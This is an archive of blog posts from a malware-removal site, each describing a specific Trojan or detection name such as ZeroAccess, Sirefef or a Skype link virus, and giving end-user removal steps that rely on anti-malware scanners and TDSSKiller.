Malware Removal Instructions

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg
Showing posts with label Trojans. Show all posts
Showing posts with label Trojans. Show all posts

Wednesday, 11 September 2013

Remove Trojan horse Generic34.BDPQ, removal instructions

Posted on 10:54 by Unknown
Trojan horse Generic34.BDPQ is a generic detection routine developed to detect common characteristics shared in several malware families. If you have managed to get this Trojan horse on your computer then it will certainly cause AVG infection warnings to come up every to five minutes or so. The worst thing is that this Trojan horse downloads and installs even more sophisticated infections, for instance, Trojan horse Crypt_s.CCD and Luhe.Sirefef.A onto your computer. Even though, Trojan horses are not technically speaking viruses as they do not reproduce themselves, which real computer viruses do. Having said this though a lot of computer viruses do use the same methods that Trojan horses do to originally gain access to your computer's system. And don't be fooled into thinking that just because Trojan horse Generic34.BDPQ isn't truly described as a computer virus that it is not something to be concerned about because it can do just as much, if not more, harm as many of the viruses in current circulation.


This Trojan horse is being distributed via spam, infected emails. Of course, just like any other malware, it can be distributed through infected websites, social networks, etc. When users click links in infected emails they usually get a warning saying that Adobe is trying to make changes to system. Since it's a complex malware infection, antivirus programs may not be able to remove it from the system. Detection rates are usually above the average for this infection, however, when you try to remove it, you may get a notification from AVG saying 'Cannot be removed Access is denied.' It means that one or more files are locked or being used by infected applications and can not be repaired. In such case, you will have to use anti-malware software that is designed to remove deeply embedded malware.

If you think that you've been the victim of a Trojan horse Generic34.BDPQ attack, please follow the removal instructions below. The one problem with this Trojan horse is though that it may leave components on your computer. You can try to remove some of its files manually if you really know what you are doing but after all you still need to scan your computer with anti-malware software. And finally, I know this has been said so many times, there are a number of steps you can take to protect yourself against the annoyance, and potential danger of Trojan horse Generic34.BDPQ, and many of these also apply to other strains of malware too. So read on and start protecting yourself today. Make sure that your security software is always up to date too and that you have the latest patches and upgrades. Pay attention to the sort of websites you (or anyone that uses your PC) visits. Certain websites can be loaded with Trojan horses and other malware. Be very careful when you open email attachments and don't click on links in emails that have come from an unfamiliar sender. Don't download and install software or programs if you don't know or trust the author. Many downloads can be bundled with Trojans and malware. Good luck and be safe online!

Written by Michael Kaur, http://deletemalware.blogspot.com


Trojan horse Generic34.BDPQ removal instructions:

1. First of all, download recommended anti-malware software and run a full system scan. It will detect and remove this infection from your computer.





2. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



3. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.



Read More
Posted in Trojans | No comments

Friday, 6 September 2013

Remove Trojan.PUP.Optional.FileScout.A, removal instructions

Posted on 09:55 by Unknown
Being infected by a computer virus is not only annoying but it can be potentially dangerous too and it can happen to any of us no matter how careful we are. Having a reputable and up to date anti-virus software program running on your PC or laptop is crucial and a decent one will pick up on the majority of viruses and stop them in their tracks. However it is always well worth knowing what to look out for - after all to be forearmed is to be forewarned!

Unwanted applications or software can install themselves on your machine in a number of ways, most commonly occurring if you have downloaded some freeware or shareware. However if you don’t want to stop downloading or streaming videos or music but you also don’t want to be putting yourself at risk, anti-virus software is the answer. Many Potentially Unwanted Programs (known as PUP’s for short) are riddled with adware or install toolbars that you have no use for. They may direct you to websites of their own choosing bombard you with annoying pop up windows and otherwise make using your computer a real pain in the backside!


Let’s take a closer look at one of these potentially unwanted orograms: Trojan.PUP.Optional.FileScout.A.

Trojan.PUP.Optional.FileScout.A is a Malwarebhtes detecttion for this specific infection, however other anti-malware applications detect it as well. The problem is that Malwarebytes doesn't remove this malware properly leaving certain associated files undetected. So, to completely remove this malware from your computer you should use other anti-malware applications as well. Despite this not actually being considered a virus, per se, this PUP is still something that you do not want on your computer. It has a number of nasty characteristics, browser hijacking being just one of them. It will also adversely affect the way you use your computer and disrupt your user experience. It also has a rootkit function which enables to it install itself deep within your operating system, making it hard to locate and tricky to get rid of. This is one PUP which you should definitely delete if you discover it on your machine.

So how did the Trojan.PUP.Optional.FileScout.A get on your computer in the first place? As mentioned above it was most likely triggered when you downloaded or streamed a video or TV show, or installed some free software such as a PDF creator. Malicious software may well be bundled in with the installation of any of these, or with the custom installer that you get on a lot of downloading websites such as CNET (read the story here), Brothersoft or Softonic.

Now you know the name and the risks but how do you limit the chance of being infected by Trojan.PUP.Optional.FileScout.A? As mentioned, install anti-malware software on your machine and run it regularly. You should also never install software if you don’t trust it and you should always read the end user license agreement carefully when installing or downloading anything. It may be long and boring but often software installers will hide browser hijackers in the installation process so you should take a good look at the wording and uncheck any boxes that appear to be offering additional software in addition to the one you actually want. To completely remove Trojan.PUP.Optional.FileScout.A from your computer, please follow the removal instructions below. If you have any questions, just ask. Good luck and be safe oneline!

Written by Michael Kaur, http://deletemalware.blogspot.com


Trojan.PUP.Optional.FileScout.A removal instructions:

1. Download recommended anti-malware software and run a full system scan to remove Trojan.PUP.Optional.FileScout.A and associated malware from your computer.





2. Remove potentially unwanted extensions from your web browser.

Google Chrome:
1. Click on Chrome menu button. Go to Tools → Extensions.
2. Click on the trashcan icon and remove the extensions that might be causing Chitka pop ups. Basically, remove all extensions that you didn't install. It's perfectly OK to remove all extensions since by default Google Chrome comes without any extensions.

Mozilla Firefox:
1. Go to Tools → Add-ons.
2. Select Extensions. Remove all extensions that you didn't install. Please note, by default Firefox comes without any extensions.

Internet Explorer:
1. Go to Tools → Manage Add-ons. If you have the latest version, simply click on the Settings button.
2. Select Toolbars and Extensions. Remove all add-ons that you didn't install or you believe may cause those annoying pop-ups to show up.

3. Download CCleaner and tidy up your computer, remove temp files, etc.

Read More
Posted in Trojans | No comments

Tuesday, 16 July 2013

Suspicious.Cloud.7.EP Removal Guide

Posted on 08:39 by Unknown
Suspicious.Cloud.7.EP is a particularly nasty strain of virus and it can have some quite devastating knock on effects on your PC. Strictly speaking this high risk infection isn’t a virus, although it is often mislabeled as one. Whatever you choose to call it, you certainly don’t want it on your computer so let’s take a little closer look at what it is and how it works.

If you keep getting notice from Norton that a high risk "Suspicious.Cloud.7.EP" was detected on your computer then your computer is probably infected with a Trojan horse or similar malware. It attaches itself to some of the files that you have stored on your computer as well as certain programs that you may have downloaded from the internet. The main characteristic of this malware infection is that once it finds a way to infect your PC it will begin to surreptitiously attack your files and probably also monitor network activity in case it's a password stealing Trojan horse.


As mentioned, Suspicious.Cloud.7.EP is not really classified as a regular computer virus with the main difference being that it doesn’t replicate and spread itself to infect other computers or operating systems. It can be a corrupted file or program that you’ve downloaded from the internet or it may be the result of a virus that has already infected you. Such malware infections are also able to steal a PC user’s personal data as well as downloading even more malware onto your machine so it stands to reason that this is one form of malware that you definitely should be protecting yourself from.

Whether you’re concerned about malicious software and viruses or not (and all computer users should be) you should always ensure that your computer has a firewall turned on and that you have a reputable brand of anti-virus software installed on your system. Because malware of all persuasions is constantly being updated by the people that create them this means that anti-virus software is too always being upgraded in response. This means that you should always check for updates and ensure you have the latest version installed with any new patches. But no matter how effective your anti-virus software maybe there is always the chance that Suspicious.Cloud.7.EP may slip through the net – after all that is the way they operate so if you have been infected read on and we’ll take a look at how to remove Suspicious.Cloud.7.EP manually.

One more thing, you should also run your anti-malware software a couple of times to make sure that you have got rid of any remaining components that may still be lurking on your machine. Suspicious.Cloud.7.EP rarely comes as a single module, usually it's a part of more advanced malware.

A Trojan Horse is far more serious than many other forms of malware so if you’ve been infected, stop what you are doing and get rid of it right away! If you have any questions or need help removing this high risk infection, please leave a comment below. Good luck and be safe online!

Written by Michael Kaur, http://deletemalware.blogspot.com


Suspicious.Cloud.7.EP removal instructions:

1. Download recommended anti-malware software (direct download) and run a full system scan to remove this high risk infection from your computer.

2. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



3. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.



Read More
Posted in Trojans | No comments

Trojan:JS/Seedabutor.B Removal Guide

Posted on 08:09 by Unknown
Trojan:JS/Seedabutor.B is a JavaScript trojan that will redirect you to malicious or spammy websites. Kaspersky indentifies this infection as Trojan.JS.Redirector.xa. If you visit an infected page, this threat will activate a malicious script withing Iframe and redirect you to another website. It may be present in your Temporary Internet Files folder, so you may get alert notifications from your antivirus software.

Typically the Seedabutor.B Trojan will be in the guise of something that you need or want, such as an upgraded patch for your security or anti-virus software which you might be told you need in an email sent by the programmers behind the Trojan. Let’s say you click on the link or open the attachment embedded in the email, this link or file will then allow the Trojan to access your computer and start doing its intended damage. Many hackers use Trojan horses as a means of gaining control over a large or secure network so that they can use them for tasks of their own choosing. However, you may also get this infection after visiting an infected website. Usually, scammers infect website through mass SQL Injection attacks.


If you download files and use freeware or shareware you should also be aware that Trojan:JS/Seedabutor.B can be hidden in these. It seems there is nowhere safe from this scourge of the internet.

So what does a Trojan:JS/Seedabutor.B do once it’s on your computer system? Such infections aren't extremely dangerous but they have a wide number of uses. Commonly they are used to obtain your private and personal information and can steal data from your social accounts. They may divert and steal secure data before it has time to reach the server it was intended for, or they simply can redirect you to malware or phishing sites. Identity theft is a very real issue when we look at the threat of a Trojan horse.

JS/Seedabutor.B might also download further strains of malware which will spread through your PC causing even more trouble. Some of them are also able to scan networks seeking out computers with security blind spots so that they can attack them.

It doesn’t matter whether someone is using a Trojan horse to cause ‘mischief’ or to empty your bank account - you should take steps to protect yourself at all costs.

Trojan:JS/Seedabutor.B isn’t a virus or a worm because it is not able to replicate itself. It's a program that has only one purpose and that is to do the job it has been tasked by its creator with its main characteristic being that you have inadvertently allowed it to do this. Luckily this makes it a little easier to deal with than other forms of malware particularly as a Trojans will often utilize the .exe file extension in Windows. Therefore you should take care not to run these types of files unless you are 100% sure that you trust the source. You should also make sure that your security and anti-virus software is always up to date and you should always obtain the original file, and any updated patches, directly from the producer’s website. Finally, follow the Trojan:JS/Seedabutor.B removal guide below to remove this Trojan and associated malware from your computer.

Written by Michael Kaur, http://deletemalware.blogspot.com


Trojan:JS/Seedabutor.B removal instructions:

1. Download recommended anti-malware software (direct download) and run a full system scan to remove this Trojan and associated malware from your computer.

2. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



3. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.



Read More
Posted in Trojans | No comments

Friday, 14 June 2013

Remove TR/ATRAPS.Gen2, removal instructions

Posted on 09:30 by Unknown
Cyber crooks and third parties that buy stolen data are increasingly using more and more sophisticated techniques, in a variety of different ways to steal your information for financial gain or to simply cause havoc on your computer seemingly for their own twisted sense of enjoyment. One of these dangers to look out for is called TR/ATRAPS.Gen2 which is a piece of malicious software in disguise. This Trojan is a tough one to remove because most of the time it comes bundled with TR/Sirefef which is a rather sophisticated malware from the Sirefef or ZeroAccess malware family. So, if you are getting a pop-up from your antivirus about this infection then your current security product is unable to remove it properly.

As far as I can tell, TR/ATRAPS.Gen2 is distributed in various ways, using infected websites, malicious emails and even game cracks or free premium account generators. Just because a program says it’s a game and it looks like a game, it is not necessarily a game and it might actually be a Trojan horse. In fact some types of Trojan horse software are programs that masquerade as anti-virus software - although they’re actually infecting you with viruses and are the very thing they claim to be protecting you against! Learn more: Rogue Antivirus software.

Access to file containing the virus or unwanted program 'TR/ATRAPS.Gen2' was blocked. 

As with types of viruses and malware, not all Trojan horses are the same either and they are split into categories depending on how they access your computer’s system and the type of damage they cause. TR/ATRAPS.Gen2 may be used to steal sensitive information, display ads on your computer or redirect your web browser to infected websites. It can also download additional malware modules onto your computer. As you can see, this Trojan horse is really well designed and coded. Detection ratio speaks for itself, it's usually below 50%, see this. I've seen some fresh samples that were detected by only two or three antivirus programs which means, this malware uses advanced techniques to bypass antivirus protection.

Unfortunately for computer users, whether it’s just you at home alone on your laptop or a network administrator in a busy corporate environment, attacks by Trojan Horses are increasing not only in amount but in sophistication too. They affect users in all countries across the globe and no one is immune so how do you protect yourself from falling victim?

The thing to remember is that just as the people of Troy were fooled by the Greeks into letting them into their city to capture it, computer Trojan horses operate on the same principle. An attacker will try to convince you to run TR/ATRAPS.Gen2 on your computer by making you think it’s perfectly safe. It is for this reason that most Trojan Horses are hidden inside games or other popular downloads.

Luckily a good (genuine!) anti-malware program will detect and delete the TR/ATRAPS.Gen2 virus before you have a chance to run them, thus installing them on your PC. It goes without saying, therefore, that you should always have decent anti-malware software installed and you should also make sure it is the most up to date version.

You should also take care not to do as the Trojans did and let ‘the horse’ in. This means never clicking on an email attachment from a sender you do not know and not downloading or installing games, anti-viruses or other programs from sources that you do not trust or are unsure about. To remove TR/ATRAPS.Gen2 from your computer, please follow the removal instructions below. If you have any questions, please leave a comment below. Good luck and be safe online!

Written by Michael Kaur, http://deletemalware.blogspot.com


TR/ATRAPS.Gen2 removal instructions:

1. Please reboot your computer is "Safe Mode with Networking". As the computer is booting tap the "F8 key" continuously which should bring up the "Windows Advanced Options Menu" as shown below. Use your arrow keys to move to "Safe Mode with Networking" and press Enter key.


NOTE: Login as the same user you were previously logged in with in the normal Windows mode.

2. Download recommended anti-malware software (direct download) and run a full system scan to remove TR/ATRAPS.Gen2 from your computer.

3. Reboot your computer as normal. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



4. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.



Read More
Posted in Trojans | No comments

Wednesday, 12 June 2013

How to remove Luhe.Sirefef.A Trojan virus (Uninstall Guide)

Posted on 08:42 by Unknown
Luhe.Sirefef.A is a malicious Trojan horse from the Sirefef malware family. Just as the good people of Troy unwittingly let their enemies into their midst, this Trojan horse will similarly trick you into infecting your own computer and being the catalyst for the damage that will then occur. How this happens is that the person who wrote and coded the Trojan horse manipulates you by convincing you to either perform an action or offer personal information, either without you realising you’re doing it, or against your better judgement. The threat is currently spreading and is ranked 60 in the world for online threats, according to AVG. Which means that there are at least 100K infected computers. If you received a pop-up warning "Found Luhe.Sirefef.A" paired with other Trojans, for example, Trojan horse Generic32.CEMU, then your computer is definitely infected with this rather sophisticated malware. Sometimes, antivirus programs cannot properly remove this infection. Most of them will suggest you to remove Luhe.Sirefef.A manually, however, this can be really difficult task. First of all, because it's a deeply embedded virus. Secondly, you can be 100% that your computer is clean, even if you think that you removed all the malicious files. So, to remove this Trojan from your computer, please follow the removal guide below.


Cyber crooks distribute this Trojan in every possible way to reach as many PC users as possible. Usually, they use hacked websites. They may also send you an email with an infected attachment, which once clicked upon will run the Trojan horse and infect your PC or laptop. For example let’s say the email has a game attached to it – it looks great fun and you can’t wait to get playing. So what do you do? You run the .exe file in order to install the game on your computer but bingo – you’ve just installed the Luhe.Sirefef.A Trojan.

What the Trojan horse will then do is to start over-writing certain sections of your hard drive thus corrupting your files and data. Very often, this virus is detected in services.exe and other system files. The only small silver lining to this cloud is that Trojan horses are not actually viruses (although many people tend to think of them as such). A computer virus will replicate itself but a Trojan horse will not. The good thing about this is that Trojan horses only wreak their damage if they are given the opportunity to run and the majority of good anti-malware software will be able to detect and delete Trojan horse software before you have a chance to do anything with it.

So what is the moral of this story that started off with a Greek army and ended up with data corruption? The number one rule is the same that should be applied when protecting yourself from all forms of malicious software and viruses: make sure you have a well-known brand of anti-malware software installed on your computer to stop Luhe.Sirefef.A in its track. And make sure it’s the latest version too.

Furthermore, don’t open programs or download software unless you are 100% sure that they come from a reliable and trusted source – particularly if they have been sent to you in the form of an executable file attached to an email. And if you don’t know the sender; then definitely don’t touch it. Remember that this is exactly the way Trojan horses work – don’t make the same mistake as the people of Troy did by letting it through the ‘gates’ of your computer. If you antivirus was unable to disinfect Luhe.Sirefef.A, please follow the removal instructions below on how to eliminate this and any other threat from your computer. If you have any questions, please leave a comment below. Good luck and be safe online!

Written by Michael Kaur, http://deletemalware.blogspot.com


Luhe.Sirefef.A removal instructions:

1. Please reboot your computer is "Safe Mode with Networking". As the computer is booting tap the "F8 key" continuously which should bring up the "Windows Advanced Options Menu" as shown below. Use your arrow keys to move to "Safe Mode with Networking" and press Enter key.


NOTE: Login as the same user you were previously logged in with in the normal Windows mode.

2. Download recommended anti-malware software (direct download) and run a full system scan to remove this Trojan from your computer.

3. Reboot your computer as normal. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



4. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.



Read More
Posted in Trojans | No comments

Wednesday, 22 May 2013

Skype virus: "this is a very nice photo of you" removal guide

Posted on 11:51 by Unknown
If you received a message from a friend saying: "this is a very nice photo of you" accompanied by a link (see image below) then your friend's computer is infected with malware. And if someone says that you're sending such messages to your friends then I'm afraid your computer is infected as well.

Updated (25/5/2013): It seems that more than a half of infected users are from Latin America. The virus is actually more sophisticated that I thought - it sends geo-targeted messages which is why its speed of propagation is above average. Users from Latin America usually get the same message in Spanish: "esta es una foto muy amable de tu parte". I'm sure users from other countries get the fake messages in their native languages as well, for example "Dies ist ein sehr schönes Foto von dir" in German.


If clicked the link leads to a website which offers web storage space. It's a popular and safe site that is misused by cyber criminals to hide their illegal activity. So, even if the file comes from what you think is a safe site, please scan the file with your antivirus software before opening it. Or even better, upload it to virustotal.com. Besides, you can't really tell the exact file extension from the link. It looks like an image file but it actually isn't. It's a zip file containing a malicious executable program.


The malicious file is detected as BackDoor.IRC.NgrBot.42 (DrWeb), a variant of Win32/Kryptik.BBHQ (ESET-NOD32) and Trojan.FakeMS (Malwarebytes). Most anti-malware programs detect this virus as ransomware. The detection rate on VirusTotal is low. Once installed, it may download different modules, for example password stealing module or a BitCoinMiner. One way or another, it will either steal your passwords or CPU power. Of course, it will keep sending malicious links to you friends, that's the whole point - to infect as many PCs as possible. The virus is launched each time the PC starts from the AppData folder. You can find the file and remove it manually, however, to completely remove this is a very nice photo of you" Skype virus, you will have to install an anti-malware software. It's a harmful infection that is spreading malware and spyware modules, needles to say they have to be removed from the system as well. Social engineering works really well in this case. Very often, such Skype spam virus links receive thousands of clicks per hour. Remember to always keep your antivirus software updates, otherwise it's useless, as new infections appear each day. Good luck and be safe online!

Written by Michael Kaur, http://deletemalware.blogspot.com



Removal instructions:

1. Download recommended anti-malware software (direct download) and run a full system scan to remove this virus from your computer.





2. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



3. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.




Read More
Posted in Trojans | No comments

Monday, 20 May 2013

Remove Trojan.Zeroaccess!inf4 (Uninstall Guide)

Posted on 12:28 by Unknown
Trojan.Zeroaccess!inf4 can be used to monitor innocent persons, attack their computer, steal their files and personal data and make changes to their computer system. The term Trojan is more commonly associated with this kind of activity and is something that we all need to be aware of and to do our best to safeguard our information and personal details so that we don’t fall victim to identity theft and other crimes. You may have arrived at this page because your computer is infected with Trojan.Zeroaccess!inf4 which requires manual removal. To remove this Trojan from your computer, please follow the removal guide below.

This Trojan horse can be used for a wide range of reasons and for a number of activities on the unsuspecting owner’s PC or laptop system. Once installed, a hacker can use it to execute and access files, change system configurations, set up ports, log key strokes, monitor packets on the network, collect different user names and passwords so that they can create other personas and attack other computers using the victim’s whilst remaining incognito and monitor – or spy to put it more accurately – computer usage, software downloaded and websites browsed.


So how do you tell if you’re the victim of this trojan? If you are using Norton Antivirus or any other Symantec product, you will get a warning stating that one of your files, for instance services.exe, (Trojan.Zeroaccess!inf4) detected by Virus scanner and Auto-Protect. In other words, this means that services.exe contains threat Trojan.Zeroaccess!inf4. The risk is high. Unfortunately it’s just not that easy because the very point of rootkits is that they are undetectable by the user.

What do you do if you think you have been infected? Even if a computer expert has attempted to remove Trojan.Zeroaccess!inf4 manually, it is very difficult for them to tell if it’s gone completely, therefore most of them recommend that the only way to deal with the situation is to scan the system with anti-malware software.

There is no antivirus or security software than can keep all rootkits at bay but there are a number of steps you can take to protect yourself. Enabling a firewall on your computer is an excellent idea as is ensuring that you always have the latest updates for all your installed software. If you don’t have antivirus software installed, make sure you do it now and always keep that up to date too, with the latest versions and patches. Knowing who has access to your PC or laptop is important too so you might want to consider limiting user privileges, especially if you leave it logged in in a public place, work environment or if you have shared living arrangements.

As always, exercise caution when opening email attachments and accepting file transfers over applications and be careful when clicking on links to webpages, both on the internet and in emails. Downloading pirated software is a no-no too and whether it’s for bank accounts or something as seemingly harmless as your Facebook account, always use strong passwords.

Unfortunately Trojan.Zeroaccess!inf4 and ZeroAccess rootkit being used for malicious purposes are a feature of the internet landscape however with a little care and attention we can all do our best to try and limit the eventuality of becomes victims ourselves. The following instructions will show you how to remove Trojan.Zeroaccess!inf4 from your computer. If you have any questions, please leave a comment below. Good luck and be safe online!

Written by Michael Kaur, http://deletemalware.blogspot.com



Trojan.Zeroaccess!inf4 removal instructions:

1. Download recommended anti-malware software (direct download) and run a full system scan to remove Trojan from your computer.

2. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



3. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.



Read More
Posted in Trojans | No comments

Wednesday, 1 May 2013

Remove Win32:Malware-gen, removal instructions

Posted on 09:21 by Unknown
This page contains removal instructions for the Win32:Malware-gen infection. Please use this guide to remove this infection and any associated malware from your computer. If you have heard of the term 'Win32:Malware-gen' in relation to computers but are not quite certain what it is, what it means and how it can affect you, read on as we will explain what it is, how it attacks your PC or laptop, how you can protect yourself against being affected – and of course, what to do in the unfortunate event that you do contract the Win32:Malware-gen.

This particular infection very often means that your computer is infected with a Trojan horse. It might be any other type of malware because it's a generic detection but from my experience most of the time it indicates Trojan infection. Trojan horses are one of the nastiest forms of malware and can seriously threaten your computer’s security. The name comes from the Greek legend in which Greece won the Trojan War by hiding their warriors inside a huge, hollow wooden horse which they wheeled to the gates of the city of Troy, in order to ambush the unsuspecting city’s inhabitants. In computer terms, a Trojan horse is used to define a “malicious, security-breaking program that is disguised as something benign”. In simpler terms, if you download what you think is a music or movie file, and it is actually a Trojan in disguise you will have installed a program on your computer than can erase everything in your system, allow the author of the Trojan to access your computer and control it to attack other users. And perhaps most worryingly of all, it may collect all of your passwords, bank account details and credit card numbers, for instance if you contracted the Zbot malware.


So how does Win32:Malware-gen actually work and how does it infect your computer? Win32 Malware-gen is an executable program which means that when you open a file – the attachment in an email for example - it will perform one or more actions. Just as the Greeks fooled the city of Troy with their wooden Trojan horse, a computer based malware needs to somehow fool you to ensure that you execute it.

This malware will most likely be disguised as something that people want: perhaps a movie, TV series, music or a game. It can be downloaded from an archive on the internet, be obtained from a peer-to-peer file sharing website or simply from an email attachment. The nasty thing about Trojans and similar malware is that you don’t normally even know you’ve been infected and will probably only find out when your contacts complain to you that are trying to infect or attack them!

So how do you avoid falling victim to Win32 Malware gen? Firstly, make sure you have good quality and up to date antivirus software installed on your computer as this will scan all documents that you receive – even ones from senders that you know and trust. This is important as you never know if they have been unwittingly infected! Secondly never even open an email from an unknown source, let alone an attachment.

Even if the sender is a friend, you should still check what the file is before you open it. A lot of these infections spread via email contact lists or address books, so it’s always best to double check, firstly with your friend to see if they intended to send you a file and then to scan the file with your antivirus software. Many Trojans appear to come from a user as they impersonate the infected person once they have control of their computer, so double check. Better safe than sorry!

Lastly, no matter how tempting an executable email attachment might look – whether it’s purporting to be a trailer for the latest big Hollywood blockbuster, a hit song, or a must play game don’t be tempted to ‘just have a quick look’ as once you’ve clicked on it, if it’s infected, that Win32:Malware-gen will be already installed upon your computer and wreaking its damage.

The biggest question is probably whether you should repair your PC or laptop or reformat it. This can be a bit of a tricky decision because as tempting as it is to repair your computer without having to start from scratch and reinstall your system, even experts find it very hard to know whether the malware is completely removed and not still running, hidden, in the background.

On the plus side though the majority of the infections stem from the same few hundred currently-circulating Trojans so experts will be aware of them and able to remove them with the appropriate removal program. Be aware though that to reinstall your system or to clean your computer completely (or as completely as possible) can take anywhere from a couple of hours to several days.

Having said that it is probably best to try and repair your computer first as in most cases it is possible to completely remove Win32:Malware-gen. If the infection does keep returning, however, it is possible that it was not totally removed so you may want to think about deleting and reinstalling your system. If you think that your computer has been infected with Win32:Malware-gen, you should download recommend antimalware software and run full system scan. Very often users say that their antivirus found the infection but can't remove it, in such case please follow the removal instructions below. If you need help, leave a comment below. Good luck and be safe online!

Written by Michael Kaur, http://deletemalware.blogspot.com



Win32:Malware-gen removal instructions:

1. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



2. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.



3. Download recommended anti-malware software (direct download) and run a full system scan to remove the remnants of this virus from your computer.

Read More
Posted in Trojans | No comments

Sunday, 14 April 2013

Remove Win32.downloader.gen, removal instructions

Posted on 09:20 by Unknown
This page contains removal instructions for the Win32.downloader.gen virus. Please use this guide to remove Win32.downloader.gen and any associated malware from your computer. Ok, so, most of us have heard of the term ‘Trojan Horse’ in relation to computer viruses but if you are not sure what exactly a Trojan horse is and how it infects your PC you might be want to know a little more about it. In this article we will take a look at what exactly a Trojan downloader is and, more importantly, how you can protect yourself and your data from being infected and corrupted.

Firstly, how does a Trojan horse infect your computer? Well it may be hard to believe but you actually play a part in the infection yourself because for a Trojan horse to do its damage, you actually need to install the client part of the application yourself. Sounds crazy, doesn’t it? Why would you physically take steps to infect your own computer, you ask, and quite rightly so. Well this is where the malicious intent behind the Trojan comes in to play as the creator of it needs to somehow convince you to download the application.

Typically this is done by social engineering – what this means is that the author of the Win32.downloader.gen will manipulate and convince you to perform an action or to divulge personal information somewhat unwittingly or against your will. Another way of getting you to install the Trojan horse on your computer system is to send you it in an email, with the hope that you will open the attachment. And this is precisely why it is called a Trojan horse; because you have to run the .exe file in order to install the program on your computer. Whether you do this knowingly or unknowingly is irrelevant, but the end result will be a nasty infected PC or laptop.

Although people often call it such, it is precisely because of this that a Trojan horse cannot be classed as a virus; because viruses reproduce on their own. As soon as you have executed the program, the application belonging to the Trojan will be installed and will immediately start running automatically every time you log on to your computer.

Win32.downloader.gen can quite literally spread like online wildfire as the majority of their developers like to spread them via email. They will send out possibly hundreds, or maybe even thousands of emails to a random selection of people via spam email and anyone who opens the email and is then unlucky or incautious enough to download the attachment will end up with an infected computer system.

Did you know that your computer can become a zombie? And no, we’re not talking about one of the walking dead from a TV show or movie. It doesn’t even have to be a person sitting at their computer and maliciously emailing their Trojan horses to unsuspecting users. It could actually be your very own computer that is at fault! If your computer system has already been infected, the person responsible for the Trojan horse in the first place may have sent you, amongst other victims, a Trojan that has turned your PC into a so-called ‘zombie computer’, meaning that they are actually in control of your system! As its name suggests, this particular Trojan will download and install additional malware onto your computer, that's why it's called downloader. Of course, it can easily install spyware or DDos modules or even Bitcoin mining trojan. This type of Trojan horse is particularly nasty because you will very likely be completely unaware that you are being remotely controlled by a hacker who will in turn be using your computer to send out more Trojans or viruses. This will eventually create an entire network of zombie computers, all at the mercy of the malicious hacker. These networks are called botnets.

If all of this sounds like something from a science fiction horror movie, don’t panic because there are steps you can take to protect yourself from becoming the victim of Win32.downloader.gen – or becoming the owner of a zombie computer. First of all, you should never even open an email from a sender that is unknown to you, and you should most definitely not download any attachments included in an email from an unknown sender either. Most spam messages will probably find their way directly to your junk email folder anyway, but don’t be fooled if one does slip through the net and make it to your inbox. If it doesn’t come from someone you know, if in the slightest bit of doubt, delete it.

Another thing to do is to make sure you have reputable – and up-to-date antivirus software installed on your computer as this will scan all of the files that you download, even ones from someone in your contact list. Furthermore, make sure your software and OS is up-to-date as well. This can be easily done using Personal Software Inspector from Secunia. If you do suspect that you’ve been infected with Win32.downloader.gen, you should download recommend antimalware software and run full system scan. Very often users say that their antivirus found the infection but can't remove Win32.downloader.gen, in such case please follow the removal instructions below. If you need help, leave a comment below. Good luck and be safe online!

Written by Michael Kaur, http://deletemalware.blogspot.com



Win32.downloader.gen removal instructions:

1. Download and run TDSSKiller. Press the button Start scan for the utility to start scanning.



2. Wait for the scan and disinfection process to be over. Then click Continue. Please reboot your computer after the disinfection is over.



3. Download recommended anti-malware software (direct download) and run a full system scan to remove the remnants of this virus from your computer.

Read More
Posted in Trojans | No comments

Thursday, 16 August 2012

Get rid of Trojan.Dropper.Bcminer (Uninstall Guide)

Posted on 10:53 by Unknown
A combination of ZeroAccess rootkit and Trojan.Dropper.Bcminer goes viral, at least in our state. Our friend, who has a small computer repair shop, told us he had to work overtime in order to repair all the computers that got infected with apparently the same nasty virus. This makes us wonder whether cyber crooks can target very small areas or was it just a coincidence? Too bad he didn't provide any logs from those infected machines.

We believe it could have been a legitimate self-hosted WordPress site or multiple sites hosting malware. That would make sense since all victims live in the same area and share the same interests, mostly. Besides, recently some antivirus companies reported that they have spotted a major malware campaign spread via infected WordPress websites using hidden iframes to victimize computer users. This approach is not new but still rather effective due to hundreds of thousands websites, especially self-hosted blogs, that are not being updated by their owners regularly. Malware authors can easily hide iframes and load malicious code from websites controlled by criminals; we usually call it a drive-by attack.

You can learn more about ZeroAccess rootkit here. Trojan.Dropper.Bcminer was something new to us and since our friend sent a sample of this infection to us, we decided to run it in our test environment. So, we ran the malicious file, rebooted the computer and yippee, we had a perfectly working combination of a nasty rootkit and Trojan.Dropper.Bcminer. Later we found out that a search results redirect module was also installed on our computer. What is more, Trojan.Dropper.Bcminer downloaded additional files from remote web servers which were necessary to start BitCoin mining. To learn more about BitCoins and how criminals use this legitimate service to earn money, please read this article about RiskTool.Win32.BitCoinMiner. The malicious files very requested from web sever closely related to BlackHole exploit kit. It wasn't surprising because this exploit kit is probably the most popular among cyber crooks right now.

We have to admit, that such malware combination makes sense. Cyber crooks earn money by redirecting victims to spam websites while they use their computers. When victims are away from their computers, cyber crooks use bitcoin mining modules to earn money as well. So, theoretically, they can earn money all day long.

Usually, our friend uses free malware removal tools to clean infected computers. His favorite is Malwarebytes' Antimalware. But this time, he was rather disappointed with this software because it just couldn't properly remove the infection.

As you can see in the image below, Malwarebytes finds malicious files and tries to remove them (reboot is required).



However, when the infected computer came back on, the remnants of this infection downloaded core malware components from web severs controlled by criminals and attempted to install Trojan.Bitminer and other malicious files once again. So, the Trojan.Dropper.Bcminer keeps coming back.



